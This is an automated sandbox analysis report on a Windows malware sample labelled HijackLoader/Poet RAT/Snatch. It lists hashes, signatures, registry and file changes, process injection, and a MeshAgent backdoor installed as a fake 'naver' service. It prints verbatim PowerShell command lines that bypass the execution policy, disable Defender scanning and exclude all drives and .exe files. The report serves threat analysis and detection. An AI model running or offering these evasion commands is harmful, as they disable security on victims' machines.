Analysis
max time kernel: 94s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-09-2024 11:28
Static task: static1
Behavioral task: behavioral1
Sample: 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
Resource: win7-20240903-en
General
Target: 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
Size: 19.0MB
MD5: e664e32eae75f70aca3b95397beb8706
SHA1: ca649ca8a6f15876d56f7a3491f7435f5b0df8ef
SHA256: d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402
SHA512: d522171534431ae1cc9c3536845f3404d89cadbd3e8481ac64c5f3b98b16d0625d6619b00e23e579b575dd99498bd43e6d1b6c07da81839337e9897b901f672a
SSDEEP: 393216:ZGbYHohSnaqtvylAjWZ0Xq9YLuxMfCVb2:gbYHPhtvylAjWZ0Xq9YLuxMfCVK
Malware Config
Signatures
Detects MeshAgent payload (1 IoC)
Processes:
  resource                                      yara_rule
  C:\Users\Admin\AppData\Local\naver\naver.exe  family_meshagent
Blocklisted process makes network request (3 IoCs)
Processes: powershell.exe
  flow  pid   process
  17    4436  powershell.exe
  19    4436  powershell.exe
  20    4436  powershell.exe
Command and Scripting Interpreter: PowerShell
Processes: powershell.exe, powershell.exe, powershell.exe
  pid   process
  2848  powershell.exe
  2244  powershell.exe
  1904  powershell.exe
Sets service image path in registry (2 TTPs, 1 IoC)
Processes: naver.exe
  description      ioc                                                                                                                                                                                      process
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\""  naver.exe
Executes dropped EXE (2 IoCs)
Processes: naver.exe, naver.exe
  pid   process
  1768  naver.exe
  1876  naver.exe
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops file in System32 directory (64 IoCs)
Processes: naver.exe, powershell.exe
  description                  ioc                                                                                                                                              process
  File opened for modification  C:\Windows\System32\dll\user32.pdb                                                                                                               naver.exe
  File opened for modification  C:\Windows\System32\gdi32full.pdb                                                                                                                naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\msvcrt.pdb                                                                                                       naver.exe
  File opened for modification  C:\Windows\System32\DLL\iphlpapi.pdb                                                                                                             naver.exe
  File opened for modification  C:\Windows\System32\ncrypt.pdb                                                                                                                   naver.exe
  File opened for modification  C:\Windows\System32\dll\shcore.pdb                                                                                                               naver.exe
  File opened for modification  C:\Windows\System32\dll\gdi32.pdb                                                                                                                naver.exe
  File opened for modification  C:\Windows\System32\shell32.pdb                                                                                                                  naver.exe
  File opened for modification  C:\Windows\System32\dll\shell32.pdb                                                                                                              naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\comctl32.pdb                                                                                                     naver.exe
  File opened for modification  C:\Windows\System32\symbols\DLL\dbgcore.pdb                                                                                                      naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\bcryptprimitives.pdb                                                                                             naver.exe
  File opened for modification  C:\Windows\System32\dll\rpcrt4.pdb                                                                                                               naver.exe
  File opened for modification  C:\Windows\System32\dll\msvcrt.pdb                                                                                                               naver.exe
  File opened for modification  C:\Windows\System32\dbghelp.pdb                                                                                                                  naver.exe
  File opened for modification  C:\Windows\System32\symbols\DLL\bcrypt.pdb                                                                                                       naver.exe
  File opened for modification  C:\Windows\System32\dll\ntasn1.pdb                                                                                                               naver.exe
  File opened for modification  C:\Windows\System32\symbols\exe\MeshService64.pdb                                                                                                naver.exe
  File opened for modification  C:\Windows\System32\dll\ws2_32.pdb                                                                                                               naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\gdi32.pdb                                                                                                        naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\gdi32full.pdb                                                                                                    naver.exe
  File opened for modification  C:\Windows\System32\ole32.pdb                                                                                                                    naver.exe
  File opened for modification  C:\Windows\System32\shcore.pdb                                                                                                                   naver.exe
  File opened for modification  C:\Windows\System32\symbols\DLL\kernel32.pdb                                                                                                     naver.exe
  File opened for modification  C:\Windows\System32\dll\ucrtbase.pdb                                                                                                             naver.exe
  File opened for modification  C:\Windows\System32\iphlpapi.pdb                                                                                                                 naver.exe
  File opened for modification  C:\Windows\System32\gdiplus.pdb                                                                                                                  naver.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\2121346EBBB554A3F69F15BA4BDE39CB93B59549  naver.exe
  File opened for modification  C:\Windows\System32\dll\ntdll.pdb                                                                                                                naver.exe
  File opened for modification  C:\Windows\System32\dll\crypt32.pdb                                                                                                              naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\ucrtbase.pdb                                                                                                     naver.exe
  File opened for modification  C:\Windows\System32\user32.pdb                                                                                                                   naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\ole32.pdb                                                                                                        naver.exe
  File opened for modification  C:\Windows\System32\dll\ncrypt.pdb                                                                                                               naver.exe
  File opened for modification  C:\Windows\System32\dll\Kernel.Appcore.pdb                                                                                                       naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\ntdll.pdb                                                                                                        naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\shcore.pdb                                                                                                       naver.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\2121346EBBB554A3F69F15BA4BDE39CB93B59549  naver.exe
  File opened for modification  C:\Windows\System32\kernelbase.pdb                                                                                                               naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\win32u.pdb                                                                                                       naver.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive                              powershell.exe
  File opened for modification  C:\Windows\System32\symbols\dll\kernelbase.pdb                                                                                                   naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\ws2_32.pdb                                                                                                       naver.exe
  File opened for modification  C:\Windows\System32\advapi32.pdb                                                                                                                 naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\sechost.pdb                                                                                                      naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\gdiplus.pdb                                                                                                      naver.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\AE20CF24999F1A151FDA441DA4540BCDA60F96F5  naver.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\1FEA0AE7DF9C1CE8F405F73E716F0906B8F38B20          naver.exe
  File opened for modification  C:\Windows\System32\MeshService64.pdb                                                                                                            naver.exe
  File opened for modification  C:\Windows\System32\rpcrt4.pdb                                                                                                                   naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\crypt32.pdb                                                                                                      naver.exe
  File opened for modification  C:\Windows\System32\msvcrt.pdb                                                                                                                   naver.exe
  File opened for modification  C:\Windows\System32\dll\comctl32.pdb                                                                                                             naver.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\AE20CF24999F1A151FDA441DA4540BCDA60F96F5  naver.exe
  File opened for modification  C:\Windows\System32\symbols\DLL\iphlpapi.pdb                                                                                                     naver.exe
  File opened for modification  C:\Windows\System32\DLL\kernel32.pdb                                                                                                             naver.exe
  File opened for modification  C:\Windows\System32\msvcp_win.pdb                                                                                                                naver.exe
  File opened for modification  C:\Windows\System32\dll\msvcp_win.pdb                                                                                                            naver.exe
  File opened for modification  C:\Windows\System32\symbols\dll\msvcp_win.pdb                                                                                                    naver.exe
  File opened for modification  C:\Windows\System32\dll\sechost.pdb                                                                                                              naver.exe
  File opened for modification  C:\Windows\System32\dll\combase.pdb                                                                                                              naver.exe
  File opened for modification  C:\Windows\System32\comctl32.pdb                                                                                                                 naver.exe
  File opened for modification  C:\Windows\System32\DLL\dbgcore.pdb                                                                                                              naver.exe
  File opened for modification  C:\Windows\System32\bcrypt.pdb                                                                                                                   naver.exe
Modifies data under HKEY_USERS (52 IoCs)
Processes: powershell.exe, naver.exe
  description      ioc                                                                                                                     process
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople                                           powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs                                      powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates                     powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716509109858256"           naver.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs                                        powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs                                         powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs                                      powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs                                      powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs                                     powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"        naver.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs                                               powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates                              powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople                                  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs                                                 powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs                                        powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed                                              powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates                                 powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates                                       powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust                                                   powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA                                                      powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates                                powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed                                     powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs                                powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs                             powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"      naver.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates                        powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs                             powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates                                      powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates                             powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing        powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates                                         powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs                                         powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root                                                    powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"        powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"       naver.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"      powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"         powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"         naver.exe
  Key created      \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry                                                 naver.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs                                                 powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot                                           powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates                              powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs                                              powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA                                             powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs                                      powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"       powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\                         powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs                                powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs                                               powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs                                              powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust                                          powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs                                     powershell.exe
Modifies system certificate store
Processes: 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
  description       ioc                                                                                                          process
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8                                                 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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  2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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  2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: powershell.exe, powershell.exe, chrome.exe
  pid   process
  4436  powershell.exe
  2244  powershell.exe
  4436  powershell.exe
  2244  powershell.exe
  4016  chrome.exe  (60 identical entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: powershell.exe, powershell.exe, chrome.exe, msedge.exe, powershell.exe, wmic.exe, wmic.exe, wmic.exe
  description                            pid   process
  Token: SeDebugPrivilege                4436  powershell.exe
  Token: SeDebugPrivilege                2244  powershell.exe
  Token: SeDebugPrivilege                4016  chrome.exe
  Token: SeDebugPrivilege                5072  msedge.exe
  Token: SeDebugPrivilege                1904  powershell.exe
  Tokens for PID 716 wmic.exe, each recorded twice (24 entries):
    SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege,
    SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege,
    SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
  Tokens for PID 4224 wmic.exe, each recorded twice (24 entries):
    SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege,
    SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege,
    SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
  Tokens for PID 4864 wmic.exe (11 entries; the list is cut off at the 64-IoC cap):
    SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege,
    SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege,
    SeSystemEnvironmentPrivilege, SeUndockPrivilege
Suspicious use of WriteProcessMemory (30 IoCs)
Processes: 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe, powershell.exe, chrome.exe, msedge.exe, naver.exe
  description                    pid   process                                                                         target process
  PID 1636 wrote to memory of 2244  1636  2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe  powershell.exe  (2 entries)
  PID 1636 wrote to memory of 4436  1636  2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe  powershell.exe  (2 entries)
  PID 4436 wrote to memory of 4016  4436  powershell.exe                                                                  chrome.exe      (4 entries)
  PID 4016 wrote to memory of 5072  4016  chrome.exe                                                                      msedge.exe      (4 entries)
  PID 5072 wrote to memory of 1904  5072  msedge.exe                                                                      powershell.exe  (2 entries)
  PID 5072 wrote to memory of 1768  5072  msedge.exe                                                                      naver.exe       (2 entries)
  PID 1876 wrote to memory of 716   1876  naver.exe                                                                       wmic.exe        (2 entries)
  PID 1876 wrote to memory of 4224  1876  naver.exe                                                                       wmic.exe        (2 entries)
  PID 1876 wrote to memory of 4864  1876  naver.exe                                                                       wmic.exe        (2 entries)
  PID 1876 wrote to memory of 4592  1876  naver.exe                                                                       wmic.exe        (2 entries)
  PID 1876 wrote to memory of 4284  1876  naver.exe                                                                       wmic.exe        (2 entries)
  PID 1876 wrote to memory of 988   1876  naver.exe                                                                       wmic.exe        (2 entries)
  PID 1876 wrote to memory of 2848  1876  naver.exe                                                                       powershell.exe  (2 entries)
Processes
(indentation shows the process tree; the bracketed number is the depth)

[1] C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"
    PID: 1636
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      PID: 2244
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -
      PID: 4436
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe"
        PID: 4016
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          PID: 5072
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            PID: 1904
            - Command and Scripting Interpreter: PowerShell
            - Suspicious use of AdjustPrivilegeToken

        [5] C:\Users\Admin\AppData\Local\naver\naver.exe
            Command line: C:\Users\Admin\AppData\Local\naver\naver.exe -install
            PID: 1768
            - Sets service image path in registry
            - Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\naver\naver.exe
    Command line: "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    PID: 1876
    - Executes dropped EXE
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\wbem\wmic.exe
      Command line: wmic SystemEnclosure get ChassisTypes
      PID: 716
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\system32\wbem\wmic.exe
      Command line: wmic os get oslanguage /FORMAT:LIST
      PID: 4224
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\wbem\wmic.exe
      Command line: wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      PID: 4864
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\system32\wbem\wmic.exe
      Command line: wmic os get oslanguage /FORMAT:LIST
      PID: 4592

  [2] C:\Windows\System32\wbem\wmic.exe
      Command line: wmic SystemEnclosure get ChassisTypes
      PID: 4284

  [2] C:\Windows\System32\wbem\wmic.exe
      Command line: wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      PID: 988

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -noprofile -nologo -command -
      PID: 2848
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Filesize: 1KB
MD5: e89c193840c8fb53fc3de104b1c4b092
SHA1: 8b41b6a392780e48cc33e673cf4412080c42981e
SHA256: 920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
SHA512: 865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 5.3MB
MD5: 34ea939943d6809e2a7058a2e45c8add
SHA1: 63a80e2dc69179e51234ba962b3cc66b8a9a8597
SHA256: 54db74abc8fd588cf08c0411d052fff4e81b4235d5326c2fd9dbb94152636a84
SHA512: e3732baaac1d8840b3a8a9a55b728a859f4aefe86a1ba162acaf4418c14224fd77c8f7ca4a294f6cbeaa5a03724d016760169fec6c735fcc0af95d0d98deb35e

Filesize: 22KB
MD5: 2dd515ea546a81398d94dd15e3b4d55c
SHA1: eb0b0fca721a296906166b7e972559b87353b726
SHA256: becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
SHA512: 439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb